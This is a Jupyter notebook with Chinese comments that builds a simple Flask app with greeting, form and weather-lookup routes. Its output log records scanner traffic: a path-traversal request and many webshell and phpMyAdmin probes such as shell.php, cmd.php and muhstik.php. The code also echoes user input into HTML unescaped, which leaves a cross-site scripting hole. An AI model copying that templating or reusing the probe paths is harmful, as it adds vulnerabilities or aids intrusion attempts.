{
 "cells": [
  {
   "cell_type": "code",
   "execution_count": 1,
   "metadata": {},
   "outputs": [],
   "source": [
    "#製作flask環境\n",
    "from weatherAPI import WeatherAPI\n",
    "from flask import Flask, request"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": 2,
   "metadata": {},
   "outputs": [],
   "source": [
    "#呼叫出Flask\n",
    "app = Flask(__name__)\n",
    "wth = WeatherAPI()"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": 3,
   "metadata": {},
   "outputs": [],
   "source": [
    "#製作一個接口，將server內部的程式做區隔，接口位置在“/hello”\n",
    "#將變數加在url中\n",
    "@app.route('/hello/<name>')\n",
    "#做一個函式是當接口被拜訪時會被啟動\n",
    "def hello(name):\n",
    "    #做一個變數\n",
    "    text = \"Hello %s!!\" % (name)\n",
    "    #回傳函式的結果給使用者\n",
    "    return text"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": 4,
   "metadata": {},
   "outputs": [],
   "source": [
    "#將變數加在url之後，要再特別的擷取出變數\n",
    "@app.route('/hello_get')\n",
    "def add():\n",
    "    name = request.args.get('name')\n",
    "    print(name)\n",
    "    age = request.args.get('age')\n",
    "    print(age)\n",
    "    if name == None:\n",
    "        text = \"Who are you?\"\n",
    "    elif age == None:\n",
    "        text = \"Hello %s!!\" % (name)\n",
    "    else:\n",
    "        text = \"Hello %s!! You are %s years old!!\" % (name, age)\n",
    "    return text"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": 5,
   "metadata": {},
   "outputs": [],
   "source": [
    "@app.route('/hello_post', methods=['GET'])\n",
    "def getdata():\n",
    "    outStr = \"\"\"\n",
    "    <!doctype html>\n",
    "    <title>Hello, World!</title>\n",
    "    <h1>Hello, your name is ?</h1>\n",
    "    <p></p>\n",
    "    <form action=\"/hello_post\" method=\"post\">\n",
    "    <label>Name:</label>\n",
    "    <input type=\"textbox\" name=\"username\">\n",
    "    <input type=\"submit\" value=\"Submit\">\n",
    "    </form>\n",
    "    \"\"\"\n",
    "    #return render_template('text.html')\n",
    "    return outStr"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": 6,
   "metadata": {},
   "outputs": [],
   "source": [
    "@app.route('/hello_post', methods=['POST'])\n",
    "def submit():\n",
    "    outStr = \"\"\"\n",
    "    <!doctype html>\n",
    "    <title>Hello, World!</title>\n",
    "    <h1>Hello, your name is ?</h1>\n",
    "    <p></p>\n",
    "    <form action=\"/hello_post\" method=\"post\">\n",
    "    <label>Name:</label>\n",
    "    <input type=\"textbox\" name=\"username\">\n",
    "    <input type=\"submit\" value=\"Submit\">\n",
    "    </form>\n",
    "    \"\"\"\n",
    "    name = request.form.get('username')\n",
    "    \n",
    "    outStr += \"\"\"\n",
    "    <h1>Hello %s !!</h1>\n",
    "    \"\"\"%(name)\n",
    "    return outStr"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": 7,
   "metadata": {},
   "outputs": [],
   "source": [
    "@app.route('/weather', methods=['GET'])\n",
    "def getWeather():\n",
    "    outStr = \"\"\"\n",
    "    <!doctype html>\n",
    "    <html>\n",
    "    <meta name=\"viewport\" content=\"width=device-width, initial-scale=1.0\">\n",
    "    <head>\n",
    "<title>Hello, Weather !</title>\n",
    "</head>\n",
    "<body>\n",
    "<h1>Hello, 請輸入中文地名獲取天氣資訊 !</h1>\n",
    "<p></p>\n",
    "<form action=\"/weather\" method=\"post\">\n",
    " <label>Location:</label>\n",
    " <input type=\"textbox\" name=\"location\">\n",
    " <input type=\"submit\" value=\"Submit\">\n",
    "</form>\n",
    "</body>\n",
    "</html>\n",
    "    \"\"\"\n",
    "#     return str(wth.setTownID(location))\n",
    "    return outStr"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": 8,
   "metadata": {},
   "outputs": [],
   "source": [
    "@app.route('/weather', methods=['POST'])\n",
    "def showWeather():\n",
    "    outStr = \"\"\"\n",
    "    <!doctype html>\n",
    "    <html>\n",
    "    <meta name=\"viewport\" content=\"width=device-width, initial-scale=1.0\">\n",
    "    <head>\n",
    "<title>Hello, Weather !</title>\n",
    "</head>\n",
    "<body>\n",
    "<h1>Hello, 請輸入中文地名獲取天氣資訊 !</h1>\n",
    "<p></p>\n",
    "<form action=\"/weather\" method=\"post\">\n",
    " <label>Location:</label>\n",
    " <input type=\"textbox\" name=\"location\">\n",
    " <input type=\"submit\" value=\"Submit\">\n",
    "</form>\n",
    "    \"\"\"\n",
    "    loc = request.form.get('location')\n",
    "    print(loc)\n",
    "    wth.setTownID(loc)\n",
    "    wth.getTownWeatherInformationDetail()\n",
    "    outStr += \"\"\"<h2>%s</h2><br>\"\"\"%(loc)\n",
    "    outStr += \"\"\"<img src=\"%s\"><br>\"\"\"%(wth.img_url)\n",
    "    outStr += \"\"\"%s<br>\"\"\"%(wth.desc)\n",
    "    outStr += \"\"\"現在氣溫 %s 度<br>\"\"\"%(wth.temperature)\n",
    "    outStr += \"\"\"體感溫度 %s 度<br>\"\"\"%(wth.felt_air_temp)\n",
    "    outStr += \"\"\"濕度 %s ％<br>\"\"\"%(wth.humidity)\n",
    "#     outStr += \"\"\"降雨量 %s ％<br>\"\"\"%(wth.rainfall)    \n",
    "    outStr += \"\"\"日出時間 %s<br>\"\"\"%(wth.sunrise)\n",
    "    outStr += \"\"\"日落時間 %s<br>\"\"\"%(wth.sunset)\n",
    "    outStr += \"\"\"</body></html>\"\"\"\n",
    "    \n",
    "    return outStr"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": 9,
   "metadata": {},
   "outputs": [],
   "source": [
    "@app.route('/get_headers')\n",
    "def get_headers():\n",
    "    t = request.headers['User-Agent']\n",
    "    return str(t)"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": null,
   "metadata": {},
   "outputs": [
    {
     "name": "stderr",
     "output_type": "stream",
     "text": [
      " * Running on http://0.0.0.0:5000/ (Press CTRL+C to quit)\n",
      "123.194.156.93 - - [07/Sep/2019 13:53:43] \"GET /get_headers HTTP/1.1\" 200 -\n",
      "123.194.156.93 - - [07/Sep/2019 13:54:24] \"GET /get_headers HTTP/1.1\" 200 -\n",
      "123.194.156.93 - - [07/Sep/2019 13:54:25] \"GET /get_headers HTTP/1.1\" 200 -\n",
      "123.194.156.93 - - [07/Sep/2019 13:54:58] \"GET /get_headers?User-Agent=Mozilla%2F5.0+%28Macintosh%3B+Intel+Mac+OS+X+10_14_5%29+AppleWebKit%2F537.36+%28KHTML%2C+like+Gecko%29+Chrome%2F75.0.3770.142+Safari%2F537.36 HTTP/1.1\" 200 -\n",
      "123.194.156.93 - - [07/Sep/2019 13:55:05] \"GET /get_headers HTTP/1.1\" 200 -\n",
      "14.185.148.41 - - [07/Sep/2019 14:16:24] code 400, message Bad request version ('HTTP')\n",
      "14.185.148.41 - - [07/Sep/2019 14:16:24] \"GET ../../mnt/custom/ProductDefinition HTTP\" HTTPStatus.BAD_REQUEST -\n",
      "170.238.36.66 - - [07/Sep/2019 14:34:14] \"GET / HTTP/1.1\" 404 -\n",
      "172.28.0.3 - - [07/Sep/2019 15:00:30] \"GET /hello_post HTTP/1.1\" 200 -\n",
      "172.28.0.3 - - [07/Sep/2019 15:00:31] \"GET /favicon.ico HTTP/1.1\" 404 -\n",
      "172.28.0.3 - - [07/Sep/2019 15:00:38] \"POST /hello_post HTTP/1.1\" 200 -\n",
      "172.28.0.3 - - [07/Sep/2019 15:01:42] \"POST /hello_post HTTP/1.1\" 200 -\n",
      "83.143.86.62 - - [07/Sep/2019 15:18:41] \"GET /admin.php HTTP/1.1\" 404 -\n",
      "83.143.86.62 - - [07/Sep/2019 15:18:41] \"GET /Lists/admin.php HTTP/1.1\" 404 -\n",
      "[2019-09-07 15:22:13,460] ERROR in app: Exception on /hello_post [POST]\n",
      "Traceback (most recent call last):\n",
      "  File \"/opt/conda/lib/python3.7/site-packages/werkzeug/serving.py\", line 132, in read_chunk_len\n",
      "    _len = int(line.strip(), 16)\n",
      "ValueError: invalid literal for int() with base 16: ''\n",
      "\n",
      "During handling of the above exception, another exception occurred:\n",
      "\n",
      "Traceback (most recent call last):\n",
      "  File \"/opt/conda/lib/python3.7/site-packages/werkzeug/formparser.py\", line 130, in wrapper\n",
      "    return f(self, stream, *args, **kwargs)\n",
      "  File \"/opt/conda/lib/python3.7/site-packages/werkzeug/formparser.py\", line 263, in _parse_urlencoded\n",
      "    form = url_decode_stream(stream, self.charset, errors=self.errors, cls=self.cls)\n",
      "  File \"/opt/conda/lib/python3.7/site-packages/werkzeug/urls.py\", line 889, in url_decode_stream\n",
      "    return cls(decoder)\n",
      "  File \"/opt/conda/lib/python3.7/site-packages/werkzeug/datastructures.py\", line 419, in __init__\n",
      "    for key, value in mapping or ():\n",
      "  File \"/opt/conda/lib/python3.7/site-packages/werkzeug/urls.py\", line 893, in _url_decode_impl\n",
      "    for pair in pair_iter:\n",
      "  File \"/opt/conda/lib/python3.7/site-packages/werkzeug/wsgi.py\", line 802, in make_chunk_iter\n",
      "    first_item = next(_iter, \"\")\n",
      "  File \"/opt/conda/lib/python3.7/site-packages/werkzeug/wsgi.py\", line 682, in _make_chunk_iter\n",
      "    item = _read(buffer_size)\n",
      "  File \"/opt/conda/lib/python3.7/site-packages/werkzeug/serving.py\", line 145, in readinto\n",
      "    self._len = self.read_chunk_len()\n",
      "  File \"/opt/conda/lib/python3.7/site-packages/werkzeug/serving.py\", line 134, in read_chunk_len\n",
      "    raise IOError(\"Invalid chunk header\")\n",
      "OSError: Invalid chunk header\n",
      "\n",
      "During handling of the above exception, another exception occurred:\n",
      "\n",
      "Traceback (most recent call last):\n",
      "  File \"/opt/conda/lib/python3.7/site-packages/werkzeug/serving.py\", line 132, in read_chunk_len\n",
      "    _len = int(line.strip(), 16)\n",
      "ValueError: invalid literal for int() with base 16: ''\n",
      "\n",
      "During handling of the above exception, another exception occurred:\n",
      "\n",
      "Traceback (most recent call last):\n",
      "  File \"/opt/conda/lib/python3.7/site-packages/flask/app.py\", line 1982, in wsgi_app\n",
      "    response = self.full_dispatch_request()\n",
      "  File \"/opt/conda/lib/python3.7/site-packages/flask/app.py\", line 1614, in full_dispatch_request\n",
      "    rv = self.handle_user_exception(e)\n",
      "  File \"/opt/conda/lib/python3.7/site-packages/flask/app.py\", line 1517, in handle_user_exception\n",
      "    reraise(exc_type, exc_value, tb)\n",
      "  File \"/opt/conda/lib/python3.7/site-packages/flask/_compat.py\", line 33, in reraise\n",
      "    raise value\n",
      "  File \"/opt/conda/lib/python3.7/site-packages/flask/app.py\", line 1612, in full_dispatch_request\n",
      "    rv = self.dispatch_request()\n",
      "  File \"/opt/conda/lib/python3.7/site-packages/flask/app.py\", line 1598, in dispatch_request\n",
      "    return self.view_functions[rule.endpoint](**req.view_args)\n",
      "  File \"<ipython-input-6-b88fe28b878a>\", line 14, in submit\n",
      "    name = request.form.get('username')\n",
      "  File \"/opt/conda/lib/python3.7/site-packages/werkzeug/local.py\", line 348, in __getattr__\n",
      "    return getattr(self._get_current_object(), name)\n",
      "  File \"/opt/conda/lib/python3.7/site-packages/werkzeug/utils.py\", line 91, in __get__\n",
      "    value = self.func(obj)\n",
      "  File \"/opt/conda/lib/python3.7/site-packages/werkzeug/wrappers/base_request.py\", line 477, in form\n",
      "    self._load_form_data()\n",
      "  File \"/opt/conda/lib/python3.7/site-packages/flask/wrappers.py\", line 185, in _load_form_data\n",
      "    RequestBase._load_form_data(self)\n",
      "  File \"/opt/conda/lib/python3.7/site-packages/werkzeug/wrappers/base_request.py\", line 316, in _load_form_data\n",
      "    self._get_stream_for_parsing(), mimetype, content_length, options\n",
      "  File \"/opt/conda/lib/python3.7/site-packages/werkzeug/formparser.py\", line 231, in parse\n",
      "    return parse_func(self, stream, mimetype, content_length, options)\n",
      "  File \"/opt/conda/lib/python3.7/site-packages/werkzeug/formparser.py\", line 137, in wrapper\n",
      "    chunk = stream.read(1024 * 64)\n",
      "  File \"/opt/conda/lib/python3.7/site-packages/werkzeug/serving.py\", line 145, in readinto\n",
      "    self._len = self.read_chunk_len()\n",
      "  File \"/opt/conda/lib/python3.7/site-packages/werkzeug/serving.py\", line 134, in read_chunk_len\n",
      "    raise IOError(\"Invalid chunk header\")\n",
      "OSError: Invalid chunk header\n",
      "172.28.0.3 - - [07/Sep/2019 15:22:13] \"POST /hello_post HTTP/1.1\" 500 -\n",
      "[2019-09-07 15:22:27,621] ERROR in app: Exception on /hello_post [POST]\n",
      "Traceback (most recent call last):\n",
      "  File \"/opt/conda/lib/python3.7/site-packages/werkzeug/serving.py\", line 132, in read_chunk_len\n",
      "    _len = int(line.strip(), 16)\n",
      "ValueError: invalid literal for int() with base 16: ''\n",
      "\n",
      "During handling of the above exception, another exception occurred:\n",
      "\n",
      "Traceback (most recent call last):\n",
      "  File \"/opt/conda/lib/python3.7/site-packages/werkzeug/formparser.py\", line 130, in wrapper\n",
      "    return f(self, stream, *args, **kwargs)\n",
      "  File \"/opt/conda/lib/python3.7/site-packages/werkzeug/formparser.py\", line 263, in _parse_urlencoded\n",
      "    form = url_decode_stream(stream, self.charset, errors=self.errors, cls=self.cls)\n",
      "  File \"/opt/conda/lib/python3.7/site-packages/werkzeug/urls.py\", line 889, in url_decode_stream\n",
      "    return cls(decoder)\n",
      "  File \"/opt/conda/lib/python3.7/site-packages/werkzeug/datastructures.py\", line 419, in __init__\n",
      "    for key, value in mapping or ():\n",
      "  File \"/opt/conda/lib/python3.7/site-packages/werkzeug/urls.py\", line 893, in _url_decode_impl\n",
      "    for pair in pair_iter:\n",
      "  File \"/opt/conda/lib/python3.7/site-packages/werkzeug/wsgi.py\", line 802, in make_chunk_iter\n",
      "    first_item = next(_iter, \"\")\n",
      "  File \"/opt/conda/lib/python3.7/site-packages/werkzeug/wsgi.py\", line 682, in _make_chunk_iter\n",
      "    item = _read(buffer_size)\n",
      "  File \"/opt/conda/lib/python3.7/site-packages/werkzeug/serving.py\", line 145, in readinto\n",
      "    self._len = self.read_chunk_len()\n",
      "  File \"/opt/conda/lib/python3.7/site-packages/werkzeug/serving.py\", line 134, in read_chunk_len\n",
      "    raise IOError(\"Invalid chunk header\")\n",
      "OSError: Invalid chunk header\n",
      "\n",
      "During handling of the above exception, another exception occurred:\n",
      "\n",
      "Traceback (most recent call last):\n",
      "  File \"/opt/conda/lib/python3.7/site-packages/werkzeug/serving.py\", line 132, in read_chunk_len\n",
      "    _len = int(line.strip(), 16)\n",
      "ValueError: invalid literal for int() with base 16: ''\n",
      "\n",
      "During handling of the above exception, another exception occurred:\n",
      "\n",
      "Traceback (most recent call last):\n",
      "  File \"/opt/conda/lib/python3.7/site-packages/flask/app.py\", line 1982, in wsgi_app\n",
      "    response = self.full_dispatch_request()\n",
      "  File \"/opt/conda/lib/python3.7/site-packages/flask/app.py\", line 1614, in full_dispatch_request\n",
      "    rv = self.handle_user_exception(e)\n",
      "  File \"/opt/conda/lib/python3.7/site-packages/flask/app.py\", line 1517, in handle_user_exception\n",
      "    reraise(exc_type, exc_value, tb)\n",
      "  File \"/opt/conda/lib/python3.7/site-packages/flask/_compat.py\", line 33, in reraise\n",
      "    raise value\n",
      "  File \"/opt/conda/lib/python3.7/site-packages/flask/app.py\", line 1612, in full_dispatch_request\n",
      "    rv = self.dispatch_request()\n",
      "  File \"/opt/conda/lib/python3.7/site-packages/flask/app.py\", line 1598, in dispatch_request\n",
      "    return self.view_functions[rule.endpoint](**req.view_args)\n",
      "  File \"<ipython-input-6-b88fe28b878a>\", line 14, in submit\n",
      "    name = request.form.get('username')\n",
      "  File \"/opt/conda/lib/python3.7/site-packages/werkzeug/local.py\", line 348, in __getattr__\n",
      "    return getattr(self._get_current_object(), name)\n",
      "  File \"/opt/conda/lib/python3.7/site-packages/werkzeug/utils.py\", line 91, in __get__\n",
      "    value = self.func(obj)\n",
      "  File \"/opt/conda/lib/python3.7/site-packages/werkzeug/wrappers/base_request.py\", line 477, in form\n",
      "    self._load_form_data()\n",
      "  File \"/opt/conda/lib/python3.7/site-packages/flask/wrappers.py\", line 185, in _load_form_data\n",
      "    RequestBase._load_form_data(self)\n",
      "  File \"/opt/conda/lib/python3.7/site-packages/werkzeug/wrappers/base_request.py\", line 316, in _load_form_data\n",
      "    self._get_stream_for_parsing(), mimetype, content_length, options\n",
      "  File \"/opt/conda/lib/python3.7/site-packages/werkzeug/formparser.py\", line 231, in parse\n",
      "    return parse_func(self, stream, mimetype, content_length, options)\n",
      "  File \"/opt/conda/lib/python3.7/site-packages/werkzeug/formparser.py\", line 137, in wrapper\n",
      "    chunk = stream.read(1024 * 64)\n",
      "  File \"/opt/conda/lib/python3.7/site-packages/werkzeug/serving.py\", line 145, in readinto\n",
      "    self._len = self.read_chunk_len()\n",
      "  File \"/opt/conda/lib/python3.7/site-packages/werkzeug/serving.py\", line 134, in read_chunk_len\n",
      "    raise IOError(\"Invalid chunk header\")\n",
      "OSError: Invalid chunk header\n"
     ]
    },
    {
     "name": "stderr",
     "output_type": "stream",
     "text": [
      "172.28.0.3 - - [07/Sep/2019 15:22:27] \"POST /hello_post HTTP/1.1\" 500 -\n",
      "[2019-09-07 15:22:31,412] ERROR in app: Exception on /hello_post [POST]\n",
      "Traceback (most recent call last):\n",
      "  File \"/opt/conda/lib/python3.7/site-packages/werkzeug/serving.py\", line 132, in read_chunk_len\n",
      "    _len = int(line.strip(), 16)\n",
      "ValueError: invalid literal for int() with base 16: ''\n",
      "\n",
      "During handling of the above exception, another exception occurred:\n",
      "\n",
      "Traceback (most recent call last):\n",
      "  File \"/opt/conda/lib/python3.7/site-packages/werkzeug/formparser.py\", line 130, in wrapper\n",
      "    return f(self, stream, *args, **kwargs)\n",
      "  File \"/opt/conda/lib/python3.7/site-packages/werkzeug/formparser.py\", line 263, in _parse_urlencoded\n",
      "    form = url_decode_stream(stream, self.charset, errors=self.errors, cls=self.cls)\n",
      "  File \"/opt/conda/lib/python3.7/site-packages/werkzeug/urls.py\", line 889, in url_decode_stream\n",
      "    return cls(decoder)\n",
      "  File \"/opt/conda/lib/python3.7/site-packages/werkzeug/datastructures.py\", line 419, in __init__\n",
      "    for key, value in mapping or ():\n",
      "  File \"/opt/conda/lib/python3.7/site-packages/werkzeug/urls.py\", line 893, in _url_decode_impl\n",
      "    for pair in pair_iter:\n",
      "  File \"/opt/conda/lib/python3.7/site-packages/werkzeug/wsgi.py\", line 802, in make_chunk_iter\n",
      "    first_item = next(_iter, \"\")\n",
      "  File \"/opt/conda/lib/python3.7/site-packages/werkzeug/wsgi.py\", line 682, in _make_chunk_iter\n",
      "    item = _read(buffer_size)\n",
      "  File \"/opt/conda/lib/python3.7/site-packages/werkzeug/serving.py\", line 145, in readinto\n",
      "    self._len = self.read_chunk_len()\n",
      "  File \"/opt/conda/lib/python3.7/site-packages/werkzeug/serving.py\", line 134, in read_chunk_len\n",
      "    raise IOError(\"Invalid chunk header\")\n",
      "OSError: Invalid chunk header\n",
      "\n",
      "During handling of the above exception, another exception occurred:\n",
      "\n",
      "Traceback (most recent call last):\n",
      "  File \"/opt/conda/lib/python3.7/site-packages/werkzeug/serving.py\", line 132, in read_chunk_len\n",
      "    _len = int(line.strip(), 16)\n",
      "ValueError: invalid literal for int() with base 16: ''\n",
      "\n",
      "During handling of the above exception, another exception occurred:\n",
      "\n",
      "Traceback (most recent call last):\n",
      "  File \"/opt/conda/lib/python3.7/site-packages/flask/app.py\", line 1982, in wsgi_app\n",
      "    response = self.full_dispatch_request()\n",
      "  File \"/opt/conda/lib/python3.7/site-packages/flask/app.py\", line 1614, in full_dispatch_request\n",
      "    rv = self.handle_user_exception(e)\n",
      "  File \"/opt/conda/lib/python3.7/site-packages/flask/app.py\", line 1517, in handle_user_exception\n",
      "    reraise(exc_type, exc_value, tb)\n",
      "  File \"/opt/conda/lib/python3.7/site-packages/flask/_compat.py\", line 33, in reraise\n",
      "    raise value\n",
      "  File \"/opt/conda/lib/python3.7/site-packages/flask/app.py\", line 1612, in full_dispatch_request\n",
      "    rv = self.dispatch_request()\n",
      "  File \"/opt/conda/lib/python3.7/site-packages/flask/app.py\", line 1598, in dispatch_request\n",
      "    return self.view_functions[rule.endpoint](**req.view_args)\n",
      "  File \"<ipython-input-6-b88fe28b878a>\", line 14, in submit\n",
      "    name = request.form.get('username')\n",
      "  File \"/opt/conda/lib/python3.7/site-packages/werkzeug/local.py\", line 348, in __getattr__\n",
      "    return getattr(self._get_current_object(), name)\n",
      "  File \"/opt/conda/lib/python3.7/site-packages/werkzeug/utils.py\", line 91, in __get__\n",
      "    value = self.func(obj)\n",
      "  File \"/opt/conda/lib/python3.7/site-packages/werkzeug/wrappers/base_request.py\", line 477, in form\n",
      "    self._load_form_data()\n",
      "  File \"/opt/conda/lib/python3.7/site-packages/flask/wrappers.py\", line 185, in _load_form_data\n",
      "    RequestBase._load_form_data(self)\n",
      "  File \"/opt/conda/lib/python3.7/site-packages/werkzeug/wrappers/base_request.py\", line 316, in _load_form_data\n",
      "    self._get_stream_for_parsing(), mimetype, content_length, options\n",
      "  File \"/opt/conda/lib/python3.7/site-packages/werkzeug/formparser.py\", line 231, in parse\n",
      "    return parse_func(self, stream, mimetype, content_length, options)\n",
      "  File \"/opt/conda/lib/python3.7/site-packages/werkzeug/formparser.py\", line 137, in wrapper\n",
      "    chunk = stream.read(1024 * 64)\n",
      "  File \"/opt/conda/lib/python3.7/site-packages/werkzeug/serving.py\", line 145, in readinto\n",
      "    self._len = self.read_chunk_len()\n",
      "  File \"/opt/conda/lib/python3.7/site-packages/werkzeug/serving.py\", line 134, in read_chunk_len\n",
      "    raise IOError(\"Invalid chunk header\")\n",
      "OSError: Invalid chunk header\n",
      "172.28.0.3 - - [07/Sep/2019 15:22:31] \"POST /hello_post HTTP/1.1\" 500 -\n",
      "172.28.0.3 - - [07/Sep/2019 15:28:11] \"POST /hello_post HTTP/1.1\" 200 -\n",
      "172.28.0.3 - - [07/Sep/2019 15:28:12] \"POST /hello_post HTTP/1.1\" 200 -\n",
      "172.28.0.3 - - [07/Sep/2019 15:28:14] \"POST /hello_post HTTP/1.1\" 200 -\n",
      "66.102.6.17 - - [07/Sep/2019 16:05:06] \"GET /hello_get?age=22 HTTP/1.1\" 200 -\n"
     ]
    },
    {
     "name": "stdout",
     "output_type": "stream",
     "text": [
      "None\n",
      "22\n"
     ]
    },
    {
     "name": "stderr",
     "output_type": "stream",
     "text": [
      "66.102.6.17 - - [07/Sep/2019 16:05:07] \"GET /favicon.ico HTTP/1.1\" 404 -\n",
      "181.129.194.74 - - [07/Sep/2019 16:24:03] \"GET / HTTP/1.1\" 404 -\n",
      "217.173.67.246 - - [07/Sep/2019 16:28:55] \"GET / HTTP/1.1\" 404 -\n",
      "89.248.169.12 - - [07/Sep/2019 16:40:32] \"GET / HTTP/1.1\" 404 -\n",
      "187.10.20.40 - - [07/Sep/2019 18:13:55] \"GET / HTTP/1.1\" 404 -\n",
      "27.74.18.102 - - [07/Sep/2019 18:32:56] code 400, message Bad request version ('HTTP')\n",
      "27.74.18.102 - - [07/Sep/2019 18:32:56] \"GET ../../mnt/custom/ProductDefinition HTTP\" HTTPStatus.BAD_REQUEST -\n",
      "186.17.190.232 - - [07/Sep/2019 18:37:38] \"GET /?_=1562619d2e523 HTTP/1.1\" 404 -\n",
      "186.17.190.232 - - [07/Sep/2019 18:37:39] \"GET /robots.txt?_=1562619d2e523 HTTP/1.1\" 404 -\n",
      "186.17.190.232 - - [07/Sep/2019 18:37:40] \"POST /App.php?_=1562619d2e523 HTTP/1.1\" 404 -\n",
      "186.17.190.232 - - [07/Sep/2019 18:37:41] \"GET /webdav/ HTTP/1.1\" 404 -\n",
      "186.17.190.232 - - [07/Sep/2019 18:37:41] \"GET /help.php HTTP/1.1\" 404 -\n",
      "186.17.190.232 - - [07/Sep/2019 18:37:42] \"GET /java.php HTTP/1.1\" 404 -\n",
      "186.17.190.232 - - [07/Sep/2019 18:37:43] \"GET /_query.php HTTP/1.1\" 404 -\n",
      "186.17.190.232 - - [07/Sep/2019 18:37:44] \"GET /test.php HTTP/1.1\" 404 -\n",
      "186.17.190.232 - - [07/Sep/2019 18:37:45] \"GET /db_cts.php HTTP/1.1\" 404 -\n",
      "186.17.190.232 - - [07/Sep/2019 18:37:45] \"GET /db_pma.php HTTP/1.1\" 404 -\n",
      "186.17.190.232 - - [07/Sep/2019 18:37:46] \"GET /logon.php HTTP/1.1\" 404 -\n",
      "186.17.190.232 - - [07/Sep/2019 18:37:47] \"GET /help-e.php HTTP/1.1\" 404 -\n",
      "186.17.190.232 - - [07/Sep/2019 18:37:48] \"GET /license.php HTTP/1.1\" 404 -\n",
      "186.17.190.232 - - [07/Sep/2019 18:37:49] \"GET /log.php HTTP/1.1\" 404 -\n",
      "186.17.190.232 - - [07/Sep/2019 18:37:50] \"GET /hell.php HTTP/1.1\" 404 -\n",
      "186.17.190.232 - - [07/Sep/2019 18:37:53] \"GET /x.php HTTP/1.1\" 404 -\n",
      "186.17.190.232 - - [07/Sep/2019 18:37:54] \"GET /shell.php HTTP/1.1\" 404 -\n",
      "186.17.190.232 - - [07/Sep/2019 18:37:55] \"GET /htdocs.php HTTP/1.1\" 404 -\n",
      "186.17.190.232 - - [07/Sep/2019 18:37:56] \"GET /b.php HTTP/1.1\" 404 -\n",
      "186.17.190.232 - - [07/Sep/2019 18:37:57] \"GET /sane.php HTTP/1.1\" 404 -\n",
      "186.17.190.232 - - [07/Sep/2019 18:37:58] \"GET /desktop.ini.php HTTP/1.1\" 404 -\n",
      "186.17.190.232 - - [07/Sep/2019 18:37:58] \"GET /z.php HTTP/1.1\" 404 -\n",
      "186.17.190.232 - - [07/Sep/2019 18:37:59] \"GET /lala.php HTTP/1.1\" 404 -\n",
      "186.17.190.232 - - [07/Sep/2019 18:38:03] \"GET /wpc.php HTTP/1.1\" 404 -\n",
      "186.17.190.232 - - [07/Sep/2019 18:38:04] \"GET /wpo.php HTTP/1.1\" 404 -\n",
      "186.17.190.232 - - [07/Sep/2019 18:38:05] \"GET /t6nv.php HTTP/1.1\" 404 -\n",
      "186.17.190.232 - - [07/Sep/2019 18:38:06] \"GET /muhstik.php HTTP/1.1\" 404 -\n",
      "186.17.190.232 - - [07/Sep/2019 18:38:06] \"GET /text.php HTTP/1.1\" 404 -\n",
      "186.17.190.232 - - [07/Sep/2019 18:38:10] \"GET /muhstik.php HTTP/1.1\" 404 -\n",
      "186.17.190.232 - - [07/Sep/2019 18:38:15] \"GET /muhstik2.php HTTP/1.1\" 404 -\n",
      "186.17.190.232 - - [07/Sep/2019 18:38:15] \"GET /muhstiks.php HTTP/1.1\" 404 -\n",
      "186.17.190.232 - - [07/Sep/2019 18:38:16] \"GET /muhstik-dpr.php HTTP/1.1\" 404 -\n",
      "186.17.190.232 - - [07/Sep/2019 18:38:20] \"GET /uploader.php HTTP/1.1\" 404 -\n",
      "186.17.190.232 - - [07/Sep/2019 18:38:22] \"GET /cmd.php HTTP/1.1\" 404 -\n",
      "186.17.190.232 - - [07/Sep/2019 18:38:22] \"GET /cmv.php HTTP/1.1\" 404 -\n",
      "186.17.190.232 - - [07/Sep/2019 18:38:23] \"GET /cmdd.php HTTP/1.1\" 404 -\n",
      "186.17.190.232 - - [07/Sep/2019 18:38:24] \"GET /knal.php HTTP/1.1\" 404 -\n",
      "186.17.190.232 - - [07/Sep/2019 18:38:25] \"GET /cmd.php HTTP/1.1\" 404 -\n",
      "186.17.190.232 - - [07/Sep/2019 18:38:26] \"GET /shell.php HTTP/1.1\" 404 -\n",
      "186.17.190.232 - - [07/Sep/2019 18:38:28] \"GET /appserv.php HTTP/1.1\" 404 -\n",
      "186.17.190.232 - - [07/Sep/2019 18:38:29] \"GET /scripts/setup.php HTTP/1.1\" 404 -\n",
      "186.17.190.232 - - [07/Sep/2019 18:38:29] \"GET /phpmyadmin/scripts/setup.php HTTP/1.1\" 404 -\n",
      "186.17.190.232 - - [07/Sep/2019 18:38:33] \"GET /scripts/db___.init.php HTTP/1.1\" 404 -\n",
      "186.17.190.232 - - [07/Sep/2019 18:38:34] \"GET /phpmyadmin/scripts/db___.init.php HTTP/1.1\" 404 -\n",
      "186.17.190.232 - - [07/Sep/2019 18:38:35] \"GET /phpMyAdmin/scripts/db___.init.php HTTP/1.1\" 404 -\n",
      "186.17.190.232 - - [07/Sep/2019 18:38:35] \"GET /pma/scripts/setup.php HTTP/1.1\" 404 -\n",
      "186.17.190.232 - - [07/Sep/2019 18:38:38] \"GET /PMA/scripts/setup.php HTTP/1.1\" 404 -\n",
      "186.17.190.232 - - [07/Sep/2019 18:38:38] \"GET /myadmin/scripts/setup.php HTTP/1.1\" 404 -\n",
      "186.17.190.232 - - [07/Sep/2019 18:38:39] \"GET /MyAdmin/scripts/setup.php HTTP/1.1\" 404 -\n",
      "186.17.190.232 - - [07/Sep/2019 18:38:40] \"GET /pma/scripts/db___.init.php HTTP/1.1\" 404 -\n",
      "186.17.190.232 - - [07/Sep/2019 18:38:43] \"GET /PMA/scripts/db___.init.php HTTP/1.1\" 404 -\n",
      "186.17.190.232 - - [07/Sep/2019 18:38:44] \"GET /myadmin/scripts/db___.init.php HTTP/1.1\" 404 -\n",
      "186.17.190.232 - - [07/Sep/2019 18:38:45] \"GET /MyAdmin/scripts/db___.init.php HTTP/1.1\" 404 -\n",
      "186.17.190.232 - - [07/Sep/2019 18:38:45] \"GET /plugins/weathermap/editor.php HTTP/1.1\" 404 -\n",
      "186.17.190.232 - - [07/Sep/2019 18:38:46] \"GET /cacti/plugins/weathermap/editor.php HTTP/1.1\" 404 -\n",
      "186.17.190.232 - - [07/Sep/2019 18:38:47] \"GET /weathermap/editor.php HTTP/1.1\" 404 -\n",
